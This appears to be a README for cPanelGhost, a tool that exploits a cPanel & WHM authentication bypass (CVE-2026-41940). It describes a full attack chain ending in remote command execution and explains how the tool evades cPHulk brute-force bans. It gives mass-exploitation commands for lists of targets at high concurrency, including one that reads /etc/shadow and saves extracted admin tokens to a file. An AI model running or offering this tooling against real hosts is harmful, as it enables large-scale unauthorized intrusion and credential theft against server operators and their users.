cPanelGhost is a exploitation and validation framework for the cPanel & WHM authentication bypass vulnerability (CVE-2026-41940). It is engineered for red teams and infrastructure operators to assess exposure accurately and at scale.
For a comprehensive technical breakdown of the vulnerability mechanics and the session forging process, refer to the watchTowr Labs analysis.
This tool was built to address the operational shortcomings observed in early public exploits, specifically regarding perimeter defense evasion and memory management during wide-scope engagements.
- cPHulk Evasion: Standard exploits attempt to forge sessions by sending invalid credentials to the root account, which immediately triggers cPHulk brute-force protections and results in IP bans. cPanelGhost mints the pre-auth cookie passively via a clean GET request to the login portal. It registers zero failed authentication attempts on the target host.
- O(1) Memory Footprint: Built on an asynchronous generator pipeline. Memory consumption remains flat regardless of the target list size, allowing for the ingestion and scanning of millions of hosts without resource exhaustion.
- Full Chain Execution: Automates the complete attack sequence: passive cookie minting, CRLF payload injection, token extraction, forced internal cache rebuild, and subsequent remote command execution (RCE).
The framework requires Python 3.10+ and relies on a single external dependency for TLS impersonation.
pip install curl_cffiusage: python3 cpanel_ghost.py [-h] [-u TARGET] [-l TARGET_FILE] [-o OUTPUT] [-c COMMAND] [-t CONCURRENCY] [--timeout TIMEOUT] [--connect-timeout CONNECT_TIMEOUT] [--verify-ssl] [-s]
CVE-2026-41940 Exploitation Framework
1. Single Target Validation Determine if a single host is vulnerable and extract the administrative token.
python3 cpanel_ghost.py -u https://target:2087/2. Mass Exploitation with RCE Ingest a list of targets and execute a command upon successful authentication bypass.
python3 cpanel_ghost.py -l targets.txt -c "id" -t 50Suppress terminal output and write confirmed hits (including RCE output and extracted tokens) directly to a JSON file. Useful for background execution in CI/CD or distributed scanning pipelines.
python3 cpanel_ghost.py -l targets.txt -c "cat /etc/shadow" -s -o results.jsonThis software is provided for educational and defensive purposes only. Utilizing this tool against infrastructure without explicit, prior mutual consent is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this framework.